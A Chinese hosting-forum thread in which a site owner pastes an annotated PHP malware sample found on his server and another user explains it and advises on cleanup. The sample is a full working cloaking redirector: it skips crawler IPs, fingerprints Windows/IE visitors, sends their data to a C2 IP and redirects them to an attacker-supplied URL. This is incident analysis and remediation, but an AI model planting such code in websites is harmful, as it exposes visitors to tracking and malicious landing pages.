Bigcar 发表于 2012-8-12 10:43:22

网站根目录下发现很多css-xx.php文件,是中毒了吗?

home/wwwroot/www.xx.com/
所有网站的根目录下都发现了很多 css-xx.php 文件,而且数量还在增加(有蔓延迹象),这是不是病毒?

参考了一个网站,英文太差,应该是中毒了 http://blog.sucuri.net/2011/01/weekly-malware-update-%E2%80%93-2010jan14.html


随便贴一个 css-anh.php

<!--?
// Analyst annotation (review): this listing is a malware sample pasted for
// identification, so the code below is documented rather than "fixed" and is
// kept byte-for-byte — the literals are useful indicators of compromise.
// The opening tag renders as "<!--?" in this paste; presumably a "<?" short tag
// in the original file.

// Suppress every PHP warning/notice so the script never leaves traces in
// error logs or page output (e.g. when HTTP_REFERER / HTTP_USER_AGENT is unset).
error_reporting(0);

// Command-and-control base URL, base64-obfuscated only to evade naive grep /
// signature scans. It decodes to: http://95.211.133.164/1awertomes/
// Network IOC: outbound HTTP from the web server to 95.211.133.164.
$xred=base64_decode('aHR0cDovLzk1LjIxMS4xMzMuMTY0LzFhd2VydG9tZXMv');

// Allow-list of IPv4 address fragments that are matched as *substrings* of
// REMOTE_ADDR further down (strstr), i.e. "216.239.46" stands for a whole
// prefix. These look like search-engine crawler ranges (66.249.64–95 is the
// classic Googlebot block) — verify against current whois before relying on
// that. Visitors matching any entry are classed as bots and are NOT
// redirected, so the crawler indexes the clean page while humans get the
// malicious redirect (search-engine cloaking).
// NOTE(review): "64.68.90.273.190" is not a valid IPv4 string — presumably a
// paste/transcription artefact or a bug in the sample; it can never match.
$ips = array("209.185.108", "209.185.253", "209.85.238", "209.85.238.11", "209.85.238.4", "216.239.33.96", "216.239.33.97", "216.239.33.98", "216.239.33.99", "216.239.37.98", "216.239.37.99", "216.239.39.98", "216.239.39.99", "216.239.41.96", "216.239.41.97", "216.239.41.98", "216.239.41.99", "216.239.45.4", "216.239.46", "216.239.51.96", "216.239.51.97", "216.239.51.98", "216.239.51.99", "216.239.53.98", "216.239.53.99", "216.239.57.96", "216.239.57.97", "216.239.57.98", "216.239.57.99", "216.239.59.98", "216.239.59.99", "216.33.229.163", "64.233.173.193", "64.233.173.194", "64.233.173.195", "64.233.173.196", "64.233.173.197", "64.233.173.198", "64.233.173.199", "64.233.173.200", "64.233.173.201", "64.233.173.202", "64.233.173.203", "64.233.173.204", "64.233.173.205", "64.233.173.206", "64.233.173.207", "64.233.173.208", "64.233.173.209", "64.233.173.210", "64.233.173.211", "64.233.173.212", "64.233.173.213", "64.233.173.214", "64.233.173.215", "64.233.173.216", "64.233.173.217", "64.233.173.218", "64.233.173.219", "64.233.173.220", "64.233.173.221", "64.233.173.222", "64.233.173.223", "64.233.173.224", "64.233.173.225", "64.233.173.226", "64.233.173.227", "64.233.173.228", "64.233.173.229", "64.233.173.230", "64.233.173.231", "64.233.173.232", "64.233.173.233", "64.233.173.234", "64.233.173.235", "64.233.173.236", "64.233.173.237", "64.233.173.238", "64.233.173.239", "64.233.173.240", "64.233.173.241", "64.233.173.242", "64.233.173.243", "64.233.173.244", "64.233.173.245", "64.233.173.246", "64.233.173.247", "64.233.173.248", "64.233.173.249", "64.233.173.250", "64.233.173.251", "64.233.173.252", "64.233.173.253", "64.233.173.254", "64.233.173.255", "64.68.80", "64.68.81", "64.68.82", "64.68.83", "64.68.84", "64.68.85", "64.68.86", "64.68.87", "64.68.88", "64.68.89", "64.68.90.1", "64.68.90.10", "64.68.90.11", "64.68.90.12", "64.68.90.129", "64.68.90.13", "64.68.90.130", "64.68.90.131", "64.68.90.132", "64.68.90.133", "64.68.90.134", "64.68.90.135", 
"64.68.90.136", "64.68.90.137", "64.68.90.138", "64.68.90.139", "64.68.90.14", "64.68.90.140", "64.68.90.141", "64.68.90.142", "64.68.90.143", "64.68.90.144", "64.68.90.145", "64.68.90.146", "64.68.90.147", "64.68.90.148", "64.68.90.149", "64.68.90.15", "64.68.90.150", "64.68.90.151", "64.68.90.152", "64.68.90.153", "64.68.90.154", "64.68.90.155", "64.68.90.156", "64.68.90.157", "64.68.90.158", "64.68.90.159", "64.68.90.16", "64.68.90.160", "64.68.90.161", "64.68.90.162", "64.68.90.163", "64.68.90.164", "64.68.90.165", "64.68.90.166", "64.68.90.167", "64.68.90.168", "64.68.90.169", "64.68.90.17", "64.68.90.170", "64.68.90.171", "64.68.90.172", "64.68.90.173", "64.68.90.174", "64.68.90.175", "64.68.90.176", "64.68.90.177", "64.68.90.178", "64.68.90.179", "64.68.90.18", "64.68.90.180", "64.68.90.181", "64.68.90.182", "64.68.90.183", "64.68.90.184", "64.68.90.185", "64.68.90.186", "64.68.90.187", "64.68.90.188", "64.68.90.189", "64.68.90.19", "64.68.90.190", "64.68.90.191", "64.68.90.192", "64.68.90.193", "64.68.90.194", "64.68.90.195", "64.68.90.196", "64.68.90.197", "64.68.90.198", "64.68.90.199", "64.68.90.2", "64.68.90.20", "64.68.90.200", "64.68.90.201", "64.68.90.202", "64.68.90.203", "64.68.90.204", "64.68.90.205", "64.68.90.206", "64.68.90.207", "64.68.90.208", "64.68.90.21", "64.68.90.22", "64.68.90.23", "64.68.90.24", "64.68.90.25", "64.68.90.26", "64.68.90.273.190", "64.233.191", "66.249.64", "66.249.65", "66.249.66", "66.249.67", "66.249.68", "66.249.69", "66.249.70", "66.249.71", "66.249.72", "66.249.73", "66.249.74", "66.249.75", "66.249.76", "66.249.77", "66.249.78", "66.249.79", "66.249.80", "66.249.81", "66.249.82", "66.249.83", "66.249.84", "66.249.85", "66.249.86", "66.249.87", "66.249.88", "66.249.89", "66.249.90", "66.249.91", "66.249.92", "66.249.93", "66.249.94", "66.249.95");

// Client address as seen by PHP. Behind a reverse proxy this is the proxy's
// address, so the crawler allow-list above would misclassify in that setup.
$thisip = $_SERVER["REMOTE_ADDR"];
// "bot" here really means "do not redirect this visitor".
$isbot = false;
// TLD list. It is never referenced in this excerpt (dead data); the poster
// says the complete file is in an attachment, so it may be used there —
// presumably for referrer/domain checks — TODO confirm against the full sample.
$zones = array(".AC", ".AD", ".AE", ".AERO", ".AF", ".AG", ".AI", ".AL", ".AM", ".AN", ".AO", ".AQ", ".AR", ".ARPA", ".AS", ".ASIA", ".AT", ".AU", ".AW", ".AX", ".AZ", ".BA", ".BB", ".BD", ".BE", ".BF", ".BG", ".BH", ".BI", ".BIZ", ".BJ", ".BM", ".BN", ".BO", ".BR", ".BS", ".BT", ".BV", ".BW", ".BY", ".BZ", ".CA", ".CAT", ".CC", ".CD", ".CF", ".CG", ".CH", ".CI", ".CK", ".CL", ".CM", ".CN", ".CO", ".COM", ".COOP", ".CR", ".CU", ".CV", ".CX", ".CY", ".CZ", ".DE", ".DJ", ".DK", ".DM", ".DO", ".DZ", ".EC", ".EDU", ".EE", ".EG", ".ER", ".ES", ".ET", ".EU", ".FI", ".FJ", ".FK", ".FM", ".FO", ".FR", ".GA", ".GB", ".GD", ".GE", ".GF", ".GG", ".GH", ".GI", ".GL", ".GM", ".GN", ".GOV", ".GP", ".GQ", ".GR", ".GS", ".GT", ".GU", ".GW", ".GY", ".HK", ".HM", ".HN", ".HR", ".HT", ".HU", ".ID", ".IE", ".IL", ".IM", ".IN", ".INFO", ".INT", ".IO", ".IQ", ".IR", ".IS", ".IT", ".JE", ".JM", ".JO", ".JOBS", ".JP", ".KE", ".KG", ".KH", ".KI", ".KM", ".KN", ".KP", ".KR", ".KW", ".KY", ".KZ", ".LA", ".LB", ".LC", ".LI", ".LK", ".LR", ".LS", ".LT", ".LU", ".LV", ".LY", ".MA", ".MC", ".MD", ".ME", ".MG", ".MH", ".MIL", ".MK", ".ML", ".MM", ".MN", ".MO", ".MOBI", ".MP", ".MQ", ".MR", ".MS", ".MT", ".MU", ".MUSEUM", ".MV", ".MW", ".MX", ".MY", ".MZ", ".NA", ".NAME", ".NC", ".NE", ".NET", ".NF", ".NG", ".NI", ".NL", ".NO", ".NP", ".NR", ".NU", ".NZ", ".OM", ".ORG", ".PA", ".PE", ".PF", ".PG", ".PH", ".PK", ".PL", ".PM", ".PN", ".PR", ".PRO", ".PS", ".PT", ".PW", ".PY", ".QA", ".RE", ".RO", ".RS", ".RU", ".RW", ".SA", ".SB", ".SC", ".SD", ".SE", ".SG", ".SH", ".SI", ".SJ", ".SK", ".SL", ".SM", ".SN", ".SO", ".SR", ".ST", ".SU", ".SV", ".SY", ".SZ", ".TC", ".TD", ".TEL", ".TF", ".TG", ".TH", ".TJ", ".TK", ".TL", ".TM", ".TN", ".TO", ".TP", ".TR", ".TT", ".TV", ".TW", ".TZ", ".UA", ".UG", ".UK", ".US", ".UY", ".UZ", ".VA", ".VC", ".VE", ".VG", ".VI", ".VN", ".VU", ".WF", ".WS", ".YE", ".YT", ".YU", ".ZA", ".ZM", ".ZW");

// Crawler check: strstr() is a plain substring test, so each list entry acts
// as a prefix ("66.249.64" covers 66.249.64.0-255) but also matches
// accidentally inside other addresses (e.g. "64.68.80" inside 164.68.80.x).
// Loose on purpose — false positives only mean a visitor is spared.
for ($i=0; $i<count($ips); $i++)
{
$curip = trim($ips[$i]);
if (strstr($thisip, $curip))
{
$isbot = true;
}
}


// Victim selection by User-Agent. Anything that is not Windows, or that is
// Firefox/Chrome, is excluded; what is left — in practice mostly Internet
// Explorer on Windows — is the population that gets redirected. This profile
// is typical of exploit-kit / traffic-distribution cloaking.
if (!$isbot)
{
$osystems = $_SERVER["HTTP_USER_AGENT"];
// strchr() is an alias of strstr(): non-Windows UAs are skipped.
$osx = strchr($osystems,"Windows");
if (!$osx)
{
$isbot = true;
}

// Firefox and Chrome are skipped as well.
$browsers1=strchr($osystems,"Firefox");
$browsers2=strchr($osystems,"Chrome");
if ( ($browsers1) or ($browsers2) )
{
$isbot = true;
}
}

/**
 * Fetch the body of a (remote) URL.
 *
 * Tries file_get_contents() first — which only works for URLs when
 * allow_url_fopen is enabled — and falls back to cURL with 5-second connect
 * and total timeouts so the victim's page does not hang if the C2 is down.
 *
 * @param string $path URL to fetch (only the URL given by the caller below).
 * @param mixed  $rt   When == 1 the fetched body is returned; for any other
 *                     value, or when both fetches yield "", the function
 *                     returns null implicitly.
 * @return string|null
 */
function xinclude ($path,$rt)
{
// Polyfill for very old PHP. Note: the two helpers are declared inside this
// function, so they become global functions the first time it runs.
if (!function_exists ("file_get_contents"))
{
function file_get_contents ($addr)
{
$a = @fopen ($addr, "r");
// NOTE(review): filesize() is given the stream handle rather than a path,
// so this fallback presumably never reads anything and the caller drops
// through to the cURL branch instead.
$tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
@fclose ($a);
if ($a) return @$tmp;
}
}

// Polyfill for writing a file ("w+" truncates). Not called anywhere in this
// excerpt; the full sample in the attachment may use it to drop further
// files — TODO confirm.
if (!function_exists ("file_put_contents"))
{
function file_put_contents ($addr, $con)
{
$a = @fopen ($addr, "w+");
if (!$a) return 0;
@fwrite ($a, $con);
@fclose ($a);
return @strlen ($con);
}
}

$content = file_get_contents ($path);
// Second attempt via cURL when the stream fetch returned nothing (or false).
if ($content=="")
{
$curl = curl_init ();
curl_setopt ($curl, CURLOPT_URL, trim($path));
curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
$content = curl_exec ($curl);
curl_close($curl);
}
if ($content!="")
{
if ($rt==1) {return $content;}
}
}


// Redirect stage, reached only for the selected victims (see $isbot above).
if (!$isbot)
{
// Visitor metadata (UA, IP, referrer) is base64-encoded and sent to the C2 as
// query parameters — this both fingerprints the victim and lets the C2 pick a
// landing page per client. HTTP_REFERER may be unset; the notice is hidden by
// error_reporting(0).
$agent7=base64_encode($_SERVER["HTTP_USER_AGENT"]);
$ip7=base64_encode($_SERVER["REMOTE_ADDR"]);
$ref7=base64_encode($_SERVER["HTTP_REFERER"]);
$xred="$xred?agent=$agent7&ip=$ip7&ref=$ref7";
// The C2 response body IS the final destination URL, so the landing page is
// attacker-controlled at request time and can differ between requests —
// one observed destination is not "the" payload URL.
$red_url_cur=xinclude("$xred","1");
$red_url_cur=trim($red_url_cur);
// Emits a Location header (empty if the C2 fetch failed) and leaves the
// original page content to whatever follows this file.
header("Location: $red_url_cur");
}

?>



完整的见附件


licess 发表于 2012-8-12 11:20:37

这是一个“隐藏重定向”(cloaking)脚本,攻击的是访客而不是网站本身:它会跳过列表里的搜索引擎爬虫 IP,以及非 Windows、Firefox/Chrome 的访客;其余访客(主要是 Windows 上的 IE)会被重定向到由 95.211.133.164 (代码里 base64 编码的 http://95.211.133.164/1awertomes/) 实时下发的地址,同时把访客的 UA、IP、来源页上报给对方。

网站程序很可能有漏洞;文件出现在所有站点的根目录下,说明入侵者很可能对整个 /home/wwwroot 都有写权限(某个站点的漏洞加上 web 用户权限过大,或者 FTP/SSH 口令已泄露)。建议:1) 不要只按文件名找,用 grep 在整个 wwwroot 搜索该脚本的特征字符串(如 base64 串 aHR0cDovLzk1LjIxMS4xMzMuMTY0 或 IP 95.211.133.164),再按修改时间(find -mtime / -newer)找同一时段被改动的其它文件,也顺带检查 index.php、.htaccess 等有没有被插入代码;2) 结合 web 访问日志定位上传入口,否则删了还会再来;3) 把可疑文件都删掉,并换掉所有密码(FTP、SSH、后台、数据库);4) 在防火墙或出口日志里关注服务器主动连接 95.211.133.164 的记录,可用来确认是否还有残留。
按 https://www.vpser.net/security/lnmp-remove-nginx-php-execute.html 把允许上传的目录的 PHP 执行权限去掉(这只是减轻措施,不能代替修复入口漏洞)。